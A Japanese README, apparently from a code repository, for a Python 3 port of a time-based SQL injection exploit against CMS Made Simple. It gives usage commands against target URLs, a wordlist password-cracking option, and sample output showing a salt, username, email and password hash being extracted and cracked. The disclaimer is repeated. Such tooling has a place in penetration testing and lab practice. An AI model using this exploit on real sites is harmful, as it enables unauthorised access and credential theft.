
このスクリプトは、Python 3との互換性を確保するためにTeymur Novruzovによってリマスターされました。このツールは教育目的のみを意図しています。許可なくシステムやネットワークでこのツールを不正使用することは違法です。作者はこのツールの誤用について一切の責任を負いません。
このスクリプトは、Teymur Novruzov によって Python 3 との互換性を確保するためにリマスターされました。このツールは教育目的のみを意図しています。許可なくシステムやネットワークでこのツールを使用することは違法です。作者はこのツールの誤用について一切の責任を負いません。
CMS Made Simple SQLインジェクションエクスプロイト(Python 3) 概要 このリポジトリには、CMS Made Simple の時間ベースのSQLインジェクション脆弱性を悪用する Python 3 スクリプトが含まれています。このスクリプトは、Teymur Novruzov によって Python 3 との互換性を確保するためにリマスターされました。
特徴
必要条件
pip install requestsでインストール)使用方法 基本的な使用方法
python3 exploit.py -u http://target-uri
パスワードクラッキングを有効にする場合
python3 exploit.py -u http://target-uri --crack
オプション
-u, --url: ベースターゲットURLを指定(例: http://10.10.10.100/cms)-c, --crack: ワードリストを使用したパスワードクラッキングを有効化例
python3 exploit.py -u http://10.10.10.100/cms
python3 exploit.py -u http://10.10.10.100/cms --crack
動作の仕組み
重要な注意事項
TIME が適切に設定されていることを確認してください。作成者 Teymur Novruzov
ライセンス このプロジェクトはMITライセンスの下で提供されています。
出力例
[+] Salt for password found: abcdef
[+] Username found: admin
[+] Email found: [email protected]
[+] Password found: 5f4dcc3b5aa765d61d8327deb882cf99\
[*] Now try to crack password
[*] Try: password
[+] Password cracked: password
免責事項 このツールは教育目的のみを意図しています。許可なくシステムやネットワークでこのツールを使用することは違法です。作者はこのツールの誤用について一切の責任を負いません。